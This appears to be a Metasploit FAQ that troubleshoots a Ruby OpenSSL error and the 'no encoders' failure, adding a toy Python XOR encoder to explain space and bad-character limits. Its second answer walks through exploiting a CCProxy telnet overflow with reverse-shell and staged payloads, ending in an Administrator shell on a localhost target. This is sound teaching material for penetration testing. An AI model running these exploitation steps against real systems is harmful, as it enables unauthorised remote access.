Metasploit/Frequently Asked Questions
Q: The first time I run Metasploit I get the following error: no such file to load -- openssl (LoadError)
- Example
[~/metasploit]# ./msfgui
./lib/rex/socket/ssl_tcp_server.rb:4:in `require': no such file to load -- openssl (LoadError)
from ./lib/rex/socket/ssl_tcp_server.rb:4
from ./lib/rex/socket/comm/local.rb:5:in `require'
from ./lib/rex/socket/comm/local.rb:5
from ./lib/rex/socket.rb:22:in `require'
from ./lib/rex/socket.rb:22
from ./lib/rex.rb:71:in `require'
from ./lib/rex.rb:71
from ./msfgui:10:in `require'
from ./msfgui:10
A: Metasploit needs the Ruby bindings for OpenSSL, not the standard C OpenSSL library used by Apache and other programs. Install the ruby-openssl package for your system.
- Example (for Debian; check your own operating system's package names, or try using gem)
pwebster@metasploit:~$ apt-cache search ruby | grep openssl
libopenssl-ruby - OpenSSL interface for Ruby
libopenssl-ruby1.8 - OpenSSL interface for Ruby 1.8
libopenssl-ruby1.9 - OpenSSL interface for Ruby 1.9
pwebster@metasploit:~# apt-get install libopenssl-ruby
Q: After setting all the required options for an exploit module and running exploit, I get the following error: [-] Exploit failed: No encoders encoded the buffer successfully.
- Example
msf > use windows/proxy/ccproxy_telnet_ping
msf exploit(ccproxy_telnet_ping) > info
Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow
Version: $Revision$
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
Patrick Webster <patrick [at] aushack.com>
Available targets:
Id Name
-- ----
0 Windows 2000 Pro SP0 - English
1 Windows 2000 Pro SP1 - English
2 Windows 2000 Pro SP2 - English
3 Windows 2000 Pro SP3 - English
4 Windows 2000 Pro SP4 - English
5 Windows XP SP0/1 - English
6 Windows 2003 Server SP0/1 - English
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 127.0.0.1 yes The target address
RPORT 23 yes The target port
Payload information:
Space: 200
Avoid: 5 characters
Description:
This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet
service. The stack is overwritten when sending an overly long
address to the 'ping' command.
msf exploit(ccproxy_telnet_ping) > set TARGET 4
TARGET => 4
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ccproxy_telnet_ping) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(ccproxy_telnet_ping) > check
[*] The target appears to be vulnerable.
msf exploit(ccproxy_telnet_ping) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
A: The payloads you can use (show payloads) depend on how much memory "space" the exploit has available. In the example above the payload space is "Space: 200". In addition, the target application does not accept certain characters (most often the null byte 0x00, because it marks the end of a C string, i.e. a character array). In this case five characters are forbidden in the payload: "Avoid: 5 characters".
When the exploit runs, the payload generator tries to fit your chosen payload into those 200 bytes without using any of the 5 forbidden characters. This is not always possible, and when it fails you get the error: No encoders encoded the buffer successfully.
However, all is not lost. The Metasploit Framework supports staged payloads. A staged payload is a significantly smaller payload that does not itself perform the action you want (for example a reverse shell); instead it launches a staging platform onto which the rest can be added. So in this case, instead of a complete reverse shell, it will:
- Set up the staging platform.
- Allocate enough space to hold your desired payload.
- Receive the remainder of the payload from you.
- Execute the payload as a whole.
Generally, staged payloads are recognised by the "/" that follows the payload name (the part after the slash is the stager). Here are some examples:
windows/dllinject/reverse_tcp Windows Inject DLL, Reverse TCP Stager
windows/download_exec/bind_tcp Windows Executable Download and Execute, Bind TCP Stager
windows/exec/find_tag Windows Execute Command, Find Tag Ordinal Stager
windows/meterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/vncinject/reverse_ord_tcp Windows VNC Inject, Reverse Ordinal TCP Stager
So, now that we know the "inline" payload will not fit, we can use a stager instead:
...
msf exploit(ccproxy_telnet_ping) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ccproxy_telnet_ping) > exploit
[*] Started reverse handler
[*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23...
[*] Sending stage (474 bytes)
[*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016)
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator>
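The two constraints described in the answer above, "Space" and "Avoid", and the reason an encoder can fail to satisfy them, can be made concrete with a small model. The following Python is an added illustration written for this page; it is not Metasploit code and does not reproduce any real encoder. The five forbidden bytes are a constructed stand-in (the module on this page says "Avoid: 5 characters" without naming them), the decoder stub length is an assumed value, and the sample buffers are arbitrary constructed bytes, not shellcode. The encoder is a toy single-byte XOR search, which is enough to show the two distinct ways the "No encoders encoded the buffer successfully" situation arises: the buffer plus its decoder is simply too long for the space, or every possible key re-introduces a forbidden byte.

```python
# Added illustration (not Metasploit code): the Space/Avoid constraints an
# exploit places on its payload and why an encoder can fail to satisfy them.
from typing import Optional, Set

# Constructed stand-in for the module's unnamed "Avoid: 5 characters".
EXAMPLE_BADCHARS: Set[int] = {0x00, 0x0A, 0x0D, 0x20, 0xFF}


def offending_bytes(buf: bytes, badchars: Set[int]) -> Set[int]:
    """Return the forbidden byte values that actually occur in buf."""
    return {b for b in buf if b in badchars}


def fits(buf: bytes, space: int, badchars: Set[int]) -> bool:
    """A buffer is usable only if it is within Space and free of Avoid bytes."""
    return len(buf) <= space and not offending_bytes(buf, badchars)


def find_xor_key(payload: bytes, space: int, badchars: Set[int],
                 stub_len: int) -> Optional[int]:
    """Toy single-byte XOR encoder search.

    Real Metasploit encoders are more elaborate, but the shape of the problem
    is the same: the encoded bytes plus a decoder stub must fit in `space`,
    and neither part may contain a forbidden byte. `stub_len` is an assumed
    size for the decoder stub that would be prepended to the encoded bytes.
    Returns the first key that works, or None when no encoding is possible.
    """
    budget = space - stub_len
    if budget < len(payload):
        return None  # encoding never shrinks the payload: this is a Space problem
    for key in range(1, 256):
        if key in badchars:
            continue  # the key itself would be embedded in the decoder stub
        encoded = bytes(b ^ key for b in payload)
        if not offending_bytes(encoded, badchars):
            return key
    return None  # every key re-introduces a forbidden byte: an Avoid problem


def explain(payload: bytes, space: int, badchars: Set[int],
            stub_len: int = 10) -> str:
    """Mirror the decision made before the framework reports
    'No encoders encoded the buffer successfully'."""
    if fits(payload, space, badchars):
        return "raw payload fits; no encoder needed"
    key = find_xor_key(payload, space, badchars, stub_len)
    if key is not None:
        return f"encoded with key 0x{key:02x}"
    return "no encoder succeeded; try a smaller (staged) payload"


if __name__ == "__main__":
    # Constructed sample buffers, not shellcode.
    has_null = bytes([0x41, 0x42, 0x00, 0x43])          # fixable by encoding
    too_long = bytes([0x41]) * 194 + b"\x00"            # 195 bytes + stub > 200
    all_values = bytes(range(256))                      # every byte value present
    print(explain(has_null, 200, EXAMPLE_BADCHARS))
    print(explain(too_long, 200, EXAMPLE_BADCHARS))
    print(explain(all_values, 400, EXAMPLE_BADCHARS))
```

The third sample shows the Avoid failure in its purest form: a buffer that contains all 256 byte values is only permuted by a single-byte XOR, so whatever key is chosen the forbidden bytes are still present. The second shows the Space failure, which is exactly the case the answer addresses by switching from an inline payload to a stager: no encoder can make a buffer shorter, so the only remedy is a smaller first stage.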